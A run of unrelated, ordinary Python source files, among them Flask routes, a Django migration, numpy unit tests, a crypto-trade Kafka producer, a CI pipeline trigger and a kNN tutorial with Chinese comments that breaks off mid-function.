return redirect(url_for('home'))
@app.route('/mother', methods=['GET', 'POST'])
def mother():
form= footer.footer()
if request.method=='POST':
return redirect(url_for('mother'))
return render_template('mother.html',form=form)
@app.route('/cpu', methods=['GET', 'POST'])
def cpu():
form= footer.footer()
if request.method=='POST':
return redirect(url_for('cpu'))
return render_template('cpu.html', form=form)
@app.route('/gpu', methods=['GET', 'POST'])
def gpu():
form= footer.footer()
if request.method=='POST':
return redirect(url_for('gpu'))
return render_template('gpu.html',form=form)
@app.route('/storage', methods=['GET', 'POST'])
def storage():
form= footer.footer()
storage=SubCategory.query.filter_by(category_id=4).all()
ssd=Product.query.filter_by(subcategory_id=7).all()
hdd=Product.query.filter_by(subcategory_id=8).all()
pdisk=Product.query.filter_by(subcategory_id=9).all()
if request.method=='POST':
return redirect(url_for('storage'))
return render_template('storage.html',form=form,ssd=ssd,hdd=hdd,pdisk=pdisk,storage=storage)
@app.route('/cart', methods=['GET', 'POST'])
def cart():
return render_template('cart.html')
@app.route('/powersupply', methods=['GET', 'POST'])
def powersupply():
form= footer.footer()
if request.method=='POST':
return redirect(url_for('powersupply'))
return render_template('power.html',form=form)
@app.route('/cooling', methods=['GET', 'POST'])
def cooling():
form= footer.footer()
if request.method=='POST':
return redirect(url_for('cooling'))
return render_template('cooling.html',form=form)
@app.route('/peripherals', methods=['GET', 'POST'])
def peripherals():
form= footer.footer()
if request.method=='POST':
return redirect(url_for('peripherals'))
return render_template('peripherals.html',form=form)
@app.route('/cases', methods=['GET', 'POST'])
def cases():
form = footer.footer()
if request.method=='POST':
return redirect(url_for('cases'))
return render_template('cases.html',form=form)
@app.route('/product/<id>', methods=['GET', 'POST'])
def product(id):
product=Product.query.filter_by(id=id).first()
form = footer.footer()
if request.method=='POST':
return redirect(url_for('cases'))
return render_template('product.html',form=form,product=product)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-08 17:55
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0023_remove_userprofile_active'),
]
operations = [
migrations.CreateModel(
name='Leader',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('livetvusername', models.CharField(max_length=40)),
('minutes', models.FloatField()),
('viewers', models.IntegerField()),
],
),
migrations.CreateModel(
name='Leaderboard',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('minutes_leaders', models.ManyToManyField(related_name='minutes_leaders', to='app.Leader')),
('viewers_leaders', models.ManyToManyField(related_name='viewers_leaders', to='app.Leader')),
],
),
]
|
#!/usr/bin/env python3
"""
Photo Folder renamer - renames folders to a standardized format
Ed Salisbury <ed.salisbury@gmail.com>
Last Modified: 2020-03-23
"""
import os
import os.path
import argparse
import re
class Renamer:
def __init__(self, **kwargs):
self.path = kwargs['path']
def get_month_num(self, name):
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September',
'October', 'November', 'December']
return months.index(name) + 1
def match_underscores(self, name):
matches = re.match(r"(\d\d\d\d)_(\d\d)_(\d\d)(.*)", name)
if matches:
m = matches.groups()
return f"{m[0]}-{m[1]}-{m[2]}{m[3]}"
def match_months(self, name):
matches = re.match(r'(\w+) (\d+), (\d+)', name)
if matches:
m = matches.groups()
return f"{int(m[2])}-{self.get_month_num(m[0]):02}-{int(m[1]):02}"
def match_location(self, name):
matches = re.match(r'(.*?), (\w+) (\d+), (\d+)$', name)
if matches:
m = matches.groups()
return f"{int(m[3])}-{self.get_month_num(m[1]):02}-{int(m[2]):02} - {m[0]}"
def rename(self):
paths = os.listdir(self.path)
for path in paths:
new_folder = self.match_underscores(path) or self.match_months(path) or self.match_location(path)
if new_folder:
old_path = os.path.join(self.path, path)
new_path = os.path.join(self.path, new_folder)
if not os.path.exists(new_path):
print(f"Renaming {path} to {new_path}")
os.rename(old_path, new_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Renames folders that have certain formats to a standardized"
" YYYY-MM-DD format")
parser.add_argument('path', help='directory of folders')
args = parser.parse_args()
renamer = Renamer(**vars(args))
renamer.rename()
|
"""Tests for the helpers.
Do not cover a lot of (very few actually) corner cases.
But it's going to be useful for maintaining the app.
"""
import numpy as np
from numpy.testing import assert_array_equal, assert_almost_equal
from screen2table import helpers
def test_functional_culvert():
sd = helpers.ScreenData(
[797, 692, 882, 938, 858, 1011],
[285, 520, 621, 420, 428, 226],
'culvert'
)
assert sd.nb_points == 6
sd.process_screen_culvert()
assert_almost_equal(
sd.xz,
np.array([
[797., 285.],
[692., 520.],
[882., 621.],
[938., 420.],
[858., 428.],
[1011., 226.]
])
)
assert_almost_equal(
sd.xz_to_plot,
np.array([
[797., 336.],
[692., 101.],
[882., 0.],
[938., 201.],
[858., 193.],
[1011., 395.],
[797., 336.]
])
)
assert_almost_equal(
sd.xzinterp,
np.array([
[797., 336.],
[736.68085106, 201.],
[733.10638298, 193.],
[692., 101.],
[882., 0.],
[910.13930348, 101.],
[935.77114428, 193.],
[938., 201.],
[858., 193.],
[864.05940594, 201.],
[966.31188119, 336.],
[1011., 395.],
[797., 336.]
])
)
userparam_dict = {
'minx': 1,
'maxx': 2,
'minz': 5,
'maxz': 10,
'angle': 0
}
up = helpers.UserParam(userparam_dict)
up.validate()
up_dict = up.convert_dict
zw_real, zw_plot = helpers.polygon_to_levelwidth_table(
sd.xzinterp,
up_dict,
)
assert_almost_equal(
zw_real,
np.array([
[5.000000000000000000e+00, 0.000000000000000000e+00],
[6.278481012658227556e+00, 6.838222679704921703e-01],
[7.443037974683544888e+00, 6.353127313475972482e-01],
[7.544303797468354666e+00, 3.993058146607029180e-01],
[9.253164556962024889e+00, 5.307582482386170586e-01],
[1.000000000000000000e+01, 0.000000000000000000e+00]
])
)
assert_almost_equal(
zw_plot,
np.array([
[5.000000000000000000e+00, 0.000000000000000000e+00],
[6.278481012658227556e+00, -3.419111339852460851e-01],
[7.443037974683544888e+00, -3.176563656737986241e-01],
[7.544303797468354666e+00, -1.996529073303514590e-01],
[9.253164556962024889e+00, -2.653791241193085293e-01],
[1.000000000000000000e+01, 0.000000000000000000e+00],
[9.253164556962024889e+00, 2.653791241193085293e-01],
[7.544303797468354666e+00, 1.996529073303514590e-01],
[7.443037974683544888e+00, 3.176563656737986241e-01],
[6.278481012658227556e+00, 3.419111339852460851e-01],
[5.000000000000000000e+00, 0.000000000000000000e+00]
])
)
assert helpers.calc_area(zw_real) == 2.250486091821753
def test_functional_xs():
sd = helpers.ScreenData(
[473, 1009, 1551],
[154, 878, 457],
'xs'
)
assert sd.nb_points == 3
sd.process_screen_xs()
userparam_dict = {
'minx': 1,
'maxx': 2,
'minz': 5,
'maxz': 10,
'angle': 0
}
up = helpers.UserParam(userparam_dict)
up.validate()
up_dict = up.convert_dict
xs_xz = helpers.scale_to_realdim(sd.xz, up_dict)
assert_almost_equal(
xs_xz,
np.array([
[1.000000000000000000e+00, 1.000000000000000000e+01],
[1.497217068645640081e+00, 5.000000000000000000e+00],
[2.000000000000000000e+00, 7.907458563535911367e+00]
])
)
assert helpers.calc_length(xs_xz) == 7.975272780439953
def test_detect_two_lines_intersection():
assert helpers.ScreenData.detect_two_lines_intersection(
[0, 0], [1, 0], [0, 1], [1, 1]
) is False
assert helpers.ScreenData.detect_two_lines_intersection(
[0, 0], [1, 1], [0, 1], [1, 1]
) is False
assert helpers.ScreenData.detect_two_lines_intersection(
[0, 0], [1, 1], [0, 1], [1, 0]
) is True
def test_is_self_intersecting_polyg():
sc = helpers.ScreenData(
[0, -0.5, 0],
[0, 0.5, 1],
'culvert'
)
assert sc.is_self_intersecting_polyg() is False
sc = helpers.ScreenData(
[1, 0, 1, 0],
[0, 0, 1, 1],
'culvert'
)
assert sc.is_self_intersecting_polyg() is True
def test_process_screen_culvert():
sc = helpers.ScreenData(
[0],
[0],
'culvert'
)
sc.process_screen_culvert()
assert sc.is_ok is False
assert sc.dict_tkwarn['toofewpoints']['is_error'] is True
sc = helpers.ScreenData(
[0, 1],
[0, 1],
'culvert'
)
sc.process_screen_culvert()
assert sc.is_ok is False
assert sc.dict_tkwarn['toofewpoints']['is_error'] is True
sc = helpers.ScreenData(
[1, 0, 1, 1],
[0, 0.5, 1, 0],
'culvert'
)
sc.process_screen_culvert()
assert sc.is_ok is False
assert sc.dict_tkwarn['duplicates']['is_error'] is True
sc = helpers.ScreenData(
[1, 0, 0, 1],
[0, 0.5, 0.5, 1],
'culvert'
)
sc.process_screen_culvert()
assert sc.is_ok is False
assert sc.dict_tkwarn['duplicates']['is_error'] is True
sc = helpers.ScreenData(
[1, 0, 1, 0],
[0, 0, 1, 1],
'culvert'
)
sc.process_screen_culvert()
assert sc.is_ok is False
assert sc.dict_tkwarn['self_intersection']['is_error'] is True
sc = helpers.ScreenData(
[0, -1, 0],
[0, -0.5, -1],
'culvert'
)
sc.process_screen_culvert()
assert sc.is_ok is True
assert all(val['is_error'] is False for val in sc.dict_tkwarn.values())
assert sc.nb_points == 3
assert_array_equal(
sc.xz,
np.array([
[0, 0],
[-1, -0.5],
[0, -1]
])
)
assert_array_equal(
sc.xz_to_plot,
np.array([
[0, 0],
[-1, 0.5],
[0, 1],
[0, 0]
])
)
assert_array_equal(
sc.xzinterp,
np.array([
[0, 0],
[-1, 0.5],
[0, 1],
[0, 0.5],
[0, 0]
])
)
def test_process_screen_xs():
sc = helpers.ScreenData(
[0],
[0],
'xs'
)
sc.process_screen_xs()
assert sc.is_ok is False
assert sc.dict_tkwarn['toofewpoints']['is_error'] is True
sc = helpers.ScreenData(
[1, 0, 1, 1],
[0, 0.5, 1, 0],
'xs'
)
sc.process_screen_xs()
assert sc.is_ok is False
assert sc.dict_tkwarn['duplicates']['is_error'] is True
sc = helpers.ScreenData(
[0, -1, 0],
[0, -0.5, -1],
'xs'
)
sc.process_screen_xs()
assert sc.is_ok is True
assert all(val['is_error'] is False for val in sc.dict_tkwarn.values())
assert sc.xzinterp is None
assert sc.nb_points == 3
assert_array_equal(sc.xz, sc.xz_to_plot)
assert_array_equal(
sc.xz_to_plot,
np.array([
[0, 0],
[-1, 0.5],
[0, 1],
])
)
def test_arr_contain_duplicates():
arr = np.array([
[0, 0],
[-0.5, 0.5],
[0, 1],
])
assert helpers.arr_contain_duplicates(arr) is False
arr = np.array([
[0, 0],
[-0.5, 0.5],
[-0.5, 0.5],
[0, 1],
])
assert helpers.arr_contain_duplicates(arr) is True
def test_flip():
assert_array_equal(
helpers.flip(np.array([[0, 4], [1, 3], [2, 2]]), 0),
np.array([[2, 4], [1, 3], [0, 2]])
)
assert_array_equal(
helpers.flip(np.array([[0, 4], [1, 3], [2, 2]]), 1),
np.array([[0, 0], [1, 1], [2, 2]])
)
def test_are_all_z_unique():
pg = np.array([
[0, 0],
[-0.5, 0.5],
[0, 1],
[0, 0]
])
assert helpers.are_all_z_unique(pg) is True
pg = np.array([
[0, 0],
[-0.5, 0.5],
[0, 1],
])
assert helpers.are_all_z_unique(pg) is True
pg = np.array([
[0, 0],
[-0.5, 0.5],
[0, 0.5],
[0, 0]
])
assert helpers.are_all_z_unique(pg) is False
def test_modify_equal_z():
np.random.seed(13)
xz = np.array([
[0, 0],
[-1, 0.5],
[1, 1],
[1, 0.5]
])
assert_almost_equal(
helpers.modify_equal_z(xz),
np.array([
[0., 0.],
[-1., 0.50055485],
[1., 1.],
[1., 0.49947561]
])
)
def test_add_z_points_to_polygon():
pg = np.array([
[0, 0],
[-0.5, 0.5],
[0, 1],
[0, 0]
])
assert_array_equal(
helpers.add_z_points_to_polygon(pg),
np.array([
[0, 0],
[-0.5, 0.5],
[0, 1],
[0, 0.5],
[0, 0]
])
)
def test_linear_interp_pt():
assert helpers.linear_interp_pt(0.5, 0, 1, 0, 1) == 0.5
assert helpers.linear_interp_pt(-0.5, 0, -1, 0, -1) == -0.5
def test_UserParam():
up = helpers.UserParam(
{
'minx': 0,
'maxx': 1,
'minz': 10,
'maxz': 20,
'angle': 15
}
)
rule_dict = up.validate()
for rule in rule_dict.values():
assert rule.is_ok is True
for param_value in up.convert_dict.values():
assert isinstance(param_value, float)
up = helpers.UserParam(
{
'minx': 1,
'maxx': 0,
'minz': 20,
'maxz': 10,
'angle': 200
}
)
rule_dict = up.validate()
for k, rule in rule_dict.items():
if k != 'float':
assert rule.is_ok is False
for param_value in up.convert_dict.values():
assert isinstance(param_value, float)
up = helpers.UserParam(
{
'minx': 'a',
'maxx': 1,
'minz': 10,
'maxz': 20,
'angle': 15
}
)
rule_dict = up.validate()
assert rule_dict['float'].is_ok is False
assert up.convert_dict is None
def test_polygon_to_levelwidth_table():
pass
def test_polygon_to_heightwidth_table():
pg = np.array([
[0, 0],
[-0.5, 0.5],
[0, 1],
[0.5, 0.5],
[0, 0]
])
assert_array_equal(
helpers.polygon_to_heightwidth_table(pg),
np.array([
[0., 0.],
[0.5, 1],
[1., 0.],
])
)
pg = np.array([
[0, 0],
[-0.5, 0.5],
[0, 1],
[0.5, 0.5]
])
assert_array_equal(
helpers.polygon_to_heightwidth_table(pg),
np.array([
[0., 0.],
[0.5, 1],
[1., 0.],
])
)
def test_scale_to_realdim():
up = {
'minx': 0,
'maxx': 1,
'minz': 10,
'maxz': 20,
'angle': 15,
}
pg = np.array([
[868., 0.],
[790.51162791, 168.],
[749., 258.],
[978., 168.],
[868., 0.]
])
assert_almost_equal(
helpers.scale_to_realdim(pg, up),
np.array([
[0.50194399, 10.],
[0.17509674, 16.51162791],
[0., 20.],
[0.96592583, 16.51162791],
[0.50194399, 10.]
])
)
def test_zw_to_plot():
zw = np.array([[0, 0], [0.5, 1], [1, 0]])
assert_array_equal(
helpers.zw_to_plot(zw),
np.array([
[0., 0.],
[0.5, -0.5],
[1., 0.],
[0.5, 0.5],
[0., 0.]
])
)
def test_remove_close_points():
zw = np.array([[0, 0], [0.05, 0.05]])
assert_array_equal(
helpers.remove_close_points(zw, threshold=0.1),
np.array([[0, 0]])
)
zw = np.array([[0, 0], [0.05, 0.05], [0.06, 0.06], [0.16, 0.16]])
assert_array_equal(
helpers.remove_close_points(zw, threshold=0.1),
np.array([[0, 0], [0.16, 0.16]])
)
zw = np.array([[0, 0], [0.05, 0.05], [0.995, 0.995], [1, 1]])
assert_array_equal(
helpers.remove_close_points(zw, threshold=0.1),
np.array([[0, 0], [0.995, 0.995]])
)
zw = np.array([[0, 0], [0.05, 0.1]])
assert_array_equal(
helpers.remove_close_points(zw, threshold=0.1),
np.array([[0, 0], [0.05, 0.1]])
)
zw = np.array([[0, 0], [0.1, 0.05]])
assert_array_equal(
helpers.remove_close_points(zw, threshold=0.1),
np.array([[0, 0], [0.1, 0.05]])
)
def test_calc_length():
pl = np.array([[0, 0], [0, 1]])
assert helpers.calc_length(pl) == 1
pl = np.array([[0, 0], [0, 1], [0, 0]])
assert helpers.calc_length(pl) == 2
pl = np.array([[0, 0], [0, 0]])
assert helpers.calc_length(pl) == 0
def test_calc_area():
pg = np.array([[0, 0], [0, 1], [1, 1], [1, 0]])
assert helpers.calc_area(pg) == 1
pg = np.array([[0, 1], [1, 1]])
assert helpers.calc_area(pg) == 1
def test_to_clipboard_for_excel():
from win32 import win32clipboard
data = np.array([[0, 0], [1, 1]])
helpers.to_clipboard_for_excel(data, decimals=1)
win32clipboard.OpenClipboard()
text = win32clipboard.GetClipboardData()
assert text == '0.0\t0.0\r\n1.0\t1.0'
|
## Ocultador de arquivo
import ctypes
# pasta = input('Digite o caminho da pasta a ser ocultada, exemplo: (C:/pasta)')
atributo_ocultar = 0x02
# Ocultar pasta
# retorno = ctypes.windll.kernel32.SetFileAttributesW(pasta, atributo_ocultar)
# Ocultar arquivo
retorno = ctypes.windll.kernel32.SetFileAttributesW('ocultar.txt', atributo_ocultar)
if retorno:
print('Arquivo foi ocultado')
else:
print('Arquivo não foi ocultado') |
from pyclesperanto_prototype._tier0 import Image
from pyclesperanto_prototype._tier0 import plugin_function
@plugin_function(categories=['label measurement', 'mesh'])
def draw_angle_mesh_between_touching_labels(labels : Image, angle_mesh_destination : Image = None) -> Image:
"""Starting from a label map, draw lines between touching neighbors
resulting in a mesh.
The end points of the lines correspond to the centroids of the labels. The
intensity of the lines
corresponds to the angle in degrees between these labels (in pixels or voxels).
Parameters
----------
labels : Image
angle_mesh_destination : Image
Returns
-------
angle_mesh_destination
References
----------
"""
from .._tier9 import centroids_of_labels
from .._tier1 import generate_angle_matrix
from .._tier1 import generate_touch_matrix
from .._tier1 import touch_matrix_to_mesh
from .._tier1 import multiply_images
from .._tier2 import radians_to_degrees
centroids = centroids_of_labels(labels)
angle_matrix = generate_angle_matrix(centroids, centroids)
touch_matrix = generate_touch_matrix(labels)
touch_angle_matrix = multiply_images(touch_matrix, angle_matrix)
touch_angle_matrix = radians_to_degrees(touch_angle_matrix)
from .._tier1 import set
set(angle_mesh_destination, 0)
angle_mesh_destination = touch_matrix_to_mesh(centroids, touch_angle_matrix, angle_mesh_destination)
return angle_mesh_destination
|
#!/usr/bin/env python3
"""
SYNOPSIS: Automatically updates every found source code repository in the
current tree, or the specified path.
"""
import argparse
import os
import subprocess
import sys
from sync_repositories.credentials import Backends
from sync_repositories.credentials import keyring as kr
from sync_repositories.repository import get_repositories
def _main():
# Go into askpass-wrapper mode if the environment specifies it.
if 'SR_ASKPASS' in os.environ:
from sync_repositories.credentials import auto_askpass
auto_askpass.execute()
# Make sure execution doesn't flow through.
raise RuntimeError("askpass_wrapper didn't terminate properly.")
ARGS = argparse.ArgumentParser(
description="""Synchronise source control repositories found in the
current tree.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
ARGS.add_argument('root_folder',
help="""The root of the directory tree where update
should be run.""",
nargs='?',
default=os.getcwd())
ARGS.add_argument('--do-not-ask', '--daemon', '-d',
dest='daemon',
action='store_true',
help="""Perform an automatic update of repositories,
skipping a repository if user interaction
would be necessary.""")
argv = ARGS.parse_args()
keyring = kr.SecretStorage.get_storage()
print("Checking '%s' for repositories..." % argv.root_folder,
file=sys.stderr)
repository_to_update_data = {}
# Perform a check that every repository's authentication status is known.
for repo in get_repositories(argv.root_folder):
repo_data = list()
for remote, url, parts in repo.get_remotes():
check_authentication = keyring.is_requiring_authentication(*parts)
needs_credentials, can_update = None, False
if check_authentication is None:
# We don't know yet whether the server requires
# authentication or not.
auth_checker = repo.get_auth_requirement_detector_for(
remote)()
try:
if auth_checker.check():
keyring.set_authenticating(*parts)
needs_credentials = True
else:
keyring.set_unauthenticated(*parts)
needs_credentials = False
can_update = True
except subprocess.CalledProcessError as cpe:
print("Failed to execute authentication check for "
"repository '%s' remote '%s':"
% (repo.path, remote))
print(cpe)
continue
elif check_authentication is False:
# We know that the server does not require authentication.
needs_credentials, can_update = False, True
else:
# We know that the server requires authentication.
needs_credentials = True
auth_backend = repo.get_authentication_method(remote)
if auth_backend == Backends.KEYRING:
if needs_credentials:
# If we realised that credentials are needed, check if
# credentials are properly known.
credentials_stored = keyring.get_credentials(*parts)
if not credentials_stored:
print("The repository '%s' has a remote server '%s' "
"is connected to, but the authentication "
"details for this server are not known!"
% (repo.path, remote))
if not argv.daemon:
# ... unless running in daemon mode, in which
# case the user won't be asked.
kr.discuss_keyring_security()
u, p = kr.ask_user_for_password(
keyring, url, parts, can_be_empty=False)
# Check if the given credentials are valid.
auth_checker = repo \
.get_auth_requirement_detector_for(remote)(
u, p)
if auth_checker.check_credentials():
can_update = True
else:
print("Invalid credentials given!",
file=sys.stderr)
protocol, server, port, objname = parts
keyring.delete_credential(protocol,
server,
port,
u,
objname)
else:
can_update = True
if can_update:
repo_data.append((remote, url, parts))
else:
print("... Skipping this repository from update.")
continue
repository_to_update_data[repo] = repo_data
# Update repositories that had been selected for actual update.
print("Performing repository updates...")
for repo, data in repository_to_update_data.items():
for remote, url, parts in data:
print("Updating '%s' from remote '%s'..." % (repo.path, remote))
auth_backend = repo.get_authentication_method(remote)
update_success = False
if auth_backend == Backends.KEYRING:
kr_creds = keyring.get_credentials(*parts)
if not kr_creds:
# If the server doesn't require authentication, don't
# provide credentials.
kr_creds = [(None, None)]
for kr_cred in kr_creds:
updater = repo.get_updater_for(remote)(*kr_cred)
update_success = update_success or updater.update()
if not update_success:
print("Failed to update '%s' from remote '%s'!"
% (repo.path, remote),
file=sys.stderr)
if __name__ == '__main__':
_main()
|
"""
Lendro Arquivos CSV
CSV = Comma Separeted Values = Valores Separados por Virgula
# Possivel de se trabalhar, mas não é o ideal ( muito trabalho )
with open('original.csv', encoding='utf-8') as arquivo:
dados = arquivo.read()
dados = dados.split(',')[2:]
print(dados)
A linguagem Python possui 2 formas diferente para ler dados em arquivos CSV:
- reader -> Permite que iteremos sobre as linhas do arquivo CSV como listas
from csv import reader
with open('original.csv', encoding='utf-8') as arquivo:
leitor_csv = reader(arquivo)
next(leitor_csv) # Pular o Cabeçalho
# cada linha é uma lista
for linha in leitor_csv:
print(f'{linha[0]} nasceu no(a) {linha[1]} e mede {linha[2]} centímetros')
- DictReader -> Peremite que iteremos sobre as lonhas do arquivo CSV como OrderedDicts;
# DictReader
from csv import DictReader
with open('original.csv', encoding='utf-8') as arquivo:
leitor_csv = DictReader(arquivo)
# cada linha é um OrderedDict
for linha in leitor_csv:
print(f"{linha['Nome']} nasceu no(a) {linha['País']} e mede {linha['Altura (em cm)']} centímetros")
"""
# DictReader com Outro separador
from csv import DictReader
with open('original.csv', encoding='utf-8') as arquivo:
leitor_csv = DictReader(arquivo, delimiter=',') # <- Mudar aqui para ; ou espaço em branco.. etc
# cada linha é um OrderedDict
for linha in leitor_csv:
print(f"{linha['Nome']} nasceu no(a) {linha['País']} e mede {linha['Altura (em cm)']} centímetros")
|
#!/home/ubuntu/archiconda3/envs/streaming/bin/python3.7
#%%
import asyncio
from binance import AsyncClient, BinanceSocketManager
from confluent_kafka import Producer
import configparser
import socket
import ast
async def main(producer):
client = await AsyncClient.create()
bm = BinanceSocketManager(client)
# start any sockets here, i.e a trade socket
ts = bm.multiplex_socket(['dogeeur@trade', 'btceur@trade', 'etheur@trade', 'maticeur@trade', 'linkeur@trade', 'doteur@trade', 'bnbeur@trade', 'adaeur@trade', 'icpeur@trade', 'xtzeur@trade'])
# then start receiving messages
async with ts as tscm:
while True:
res = await tscm.recv()
dictionary = ast.literal_eval(str(res))
#print(dictionary)
csv_record = "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (
dictionary["stream"],
dictionary["data"]["E"],
dictionary["data"]["s"],
dictionary["data"]["t"],
dictionary["data"]["p"],
dictionary["data"]["q"],
dictionary["data"]["b"],
dictionary["data"]["a"],
dictionary["data"]["T"],
dictionary["data"]["m"],
dictionary["data"]["M"])
producer.produce('crypto', value=csv_record)
producer.flush()
await client.close_connection()
#%%
if __name__ == "__main__":
conf = {'bootstrap.servers': "localhost:9092",
'client.id': socket.gethostname()}
producer = Producer(conf)
loop = asyncio.get_event_loop()
loop.run_until_complete(main(producer))
# %%
|
#!/usr/bin/env python3
# Copyright (c) 2021 by Apex.AI Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
import os
import requests
import sys
import time
def main():
data = {
'token': os.environ['AXIVION_TRIGGER_TOKEN'],
'ref': os.environ.get('AXIVION_REF_NAME', 'master'),
}
commit_sha = os.environ['GITHUB_SHA']
r = requests.post(
f'https://gitlab.com/api/v4/projects/24081973/trigger/pipeline?variables[ICEORYX_SHA]={commit_sha}',
json=data)
if r.status_code != 201:
print(f'ERROR: Pipeline trigger failed: {r.status_code}', file=sys.stderr)
sys.exit(1)
pipeline_id = r.json()['id']
print(pipeline_id)
if __name__ == "__main__":
main()
|
import time
def spin():
for _ in range( 100 ):
for ch in '-\\|/':
print(ch, end='', flush=True)
time.sleep(0.1)
print('\b', end='', flush=True)
if __name__ == '__main__':
spin()
|
# import webdriver
from selenium import webdriver
# create webdriver object
driver = webdriver.Firefox()
# get geeksforgeeks.org
driver.get("http://192.168.4.1")
# get element
element = driver.find_element_by_id("turnleft")
while True:
# click the element
element.click()
|
# -*- coding:utf-8 -*-
import numpy as np
from matplotlib.font_manager import FontProperties
import matplotlib.lines as mlines
import matplotlib.pyplot as plt
from IPython.core.pylabtools import figsize
import operator
"""
函数说明:kNN算法,分类器
Parameters:
inX-用于分类的数据(测试集)
dataSet-用于训练的数据(训练集)
labels-分类标签
k-kNN算法参数,选择距离最小的k个点
returns:
sortedClassCount[0][0]-分类结果
"""
def classify0(inX,dataSet,labels,k):
#返回shape[0]的行数
dataSetSize=dataSet.shape[0]
#在列向量方向上重复inX共1次(横向),行向量方向上重复inX共dataSetSize次(纵向)
diffMat=np.tile(inX, (dataSetSize,1))-dataSet
#二维特征相减后平方
sqDiffMat=diffMat**2
#sum()所有元素相加,sum(0)列相加,sum(1)行相加
sqDistances=sqDiffMat.sum(axis=1)
#开方,计算出距离
distances=sqDistances**0.5
#返回distances中元素从小到大排序后的索引值
sortedDistIndices=distances.argsort()
#定一个记录类别次数的字典
classCount={}
for i in range(k):
#取出前K个元素的类别
voteIlabel=labels[sortedDistIndices[i]]
#字典的get()方法,返回指定键的值,如果值不在字典中返回默认值。
#记录类别次数
classCount[voteIlabel]=classCount.get(voteIlabel,0)+1
#reverse降序排序字典
sortedClassCount=sorted(classCount.items(),key=operator.itemgetter(1),reverse=True)
#返回次数最多的类别,即所要分类的类别
return sortedClassCount[0][0]
"""
函数说明:打开并解析文件,对数据进行分类:1代表不喜欢,2代表魅力一般,3极具魅力
parameters:
filename:文件名
Returns:
returnMat:特征矩阵
classLableVector-分类Label向量
"""
def file2matrix(filename):
#打开文件
fr=open(filename)
#读取文件所有内容
arrayOLines=fr.readlines()
#得到文件行数
numberOfLines=len(arrayOLines)
#返回的NumPy矩阵,解析完成的数据:arrayOLines列,3列
returnMat=np.zeros((numberOfLines,3))
#返回的分类标签向量
classLabelVector=[]
#行的索引值
index=0
#
for line in arrayOLines:
#删除字符串中的空白符号
line=line.strip()
#根据“\t”进行字符串分割
listFormLine=line.split('\t')
#将数据前三列提取出来,存放到returnMat的NumPy矩阵中,也就是特征矩阵
returnMat[index,:]=listFormLine[0:3]
#根据文本标记进行分类,1--不喜欢,2--魅力一般,3--极具魅力
if listFormLine[-1]=='didntLike':
classLabelVector.append(1)
elif listFormLine[-1]=='smallDoses':
classLabelVector.append(2)
elif listFormLine[-1]=='largeDoses':
classLabelVector.append(3)
index+=1
return returnMat,classLabelVector
"""
函数说明:数据可视化
parameters:
datingDataMat:特征矩阵
classLableVector-分类Label向量
Returns:
无
"""
def showdatas(datingDataMat,datingLabels):
#设置字体
font=FontProperties(fname=r"c:\windows\fonts\simsun.ttc",size=14)
#设置画布,不共享xy轴,画布大小为(13,8)
#当nrows=2, ncols=2,代表画布被划分为四个区域,axs[0][0]代表第一个区域
fig,axs=plt.subplots(nrows=2, ncols=2, sharex=False, sharey=False,
figsize=(13,13))
numberOfLabels=len(datingLabels)
LabelsColors=[]
for i in datingLabels:
if i == 1:
LabelsColors.append('black')
if i == 2:
LabelsColors.append('orange')
if i == 3:
LabelsColors.append('red')
#画出散点图,以datingDataMat矩阵的第一和第二列数据画散点数据,散点大小为15,透明度为0.5
axs[0][0].scatter(x=datingDataMat[:,0],y=datingDataMat[:,1],color=LabelsColors,s=15,alpha=.5)
#设置标题,x轴label,y轴label
axs0_title_text=axs[0][0].set_title('每年获得的飞行常客里程数与玩视频游戏所消耗时间占比',FontProperties=font)
axs0_xlabel_text=axs[0][0].set_xlabel('每年获得的飞行常客里程数',FontProperties=font)
axs0_ylabel_text=axs[0][0].set_ylabel('玩视频游戏所消耗时间占',FontProperties=font)
plt.setp(axs0_title_text,size=9,weight='bold',color='red')
plt.setp(axs0_xlabel_text,size=7,weight='bold',color='black')
plt.setp(axs0_ylabel_text,size=7,weight='bold',color='black')
#画出散点图,以datingDataMat矩阵的第一和第三列数据画散点数据,散点大小为15,透明度为0.5
axs[0][1].scatter(x=datingDataMat[:,0],y=datingDataMat[:,2],color=LabelsColors,s=15,alpha=.5)
axs1_title_text=axs[0][1].set_title('每年获得的飞行常客里程数与每周消费的冰激淋公升数',FontProperties=font)
axs1_xlabel_text=axs[0][1].set_xlabel('每年获得的飞行常客里程数',FontProperties=font)
axs1_ylabel_text=axs[0][1].set_ylabel('每周消费的冰激淋公升数',FontProperties=font)
plt.setp(axs1_title_text,size=9,weight='bold',color='red')
plt.setp(axs1_xlabel_text,size=7,weight='bold',color='black')
plt.setp(axs1_ylabel_text,size=7,weight='bold',color='black')
#画出散点图,以datingDataMat矩阵的第二和第三列数据画散点数据,散点大小为15,透明度为0.5
axs[1][0].scatter(x=datingDataMat[:,1],y=datingDataMat[:,2],color=LabelsColors,s=15,alpha=.5)
axs2_title_text=axs[1][0].set_title('玩视频游戏所消耗时间占比与每周消费的冰激淋公升数',FontProperties=font)
axs2_xlabel_text=axs[1][0].set_xlabel('玩视频游戏所消耗时间占比',FontProperties=font)
axs2_ylabel_text=axs[1][0].set_ylabel('每周消费的冰激淋公升数',FontProperties=font)
plt.setp(axs2_title_text,size=9,weight='bold',color='red')
plt.setp(axs2_xlabel_text,size=7,weight='bold',color='black')
plt.setp(axs2_ylabel_text,size=7,weight='bold',color='black')
#设置图例
didntLike=mlines.Line2D([],[],color='black',marker='.',markersize=6,label='didntLike')
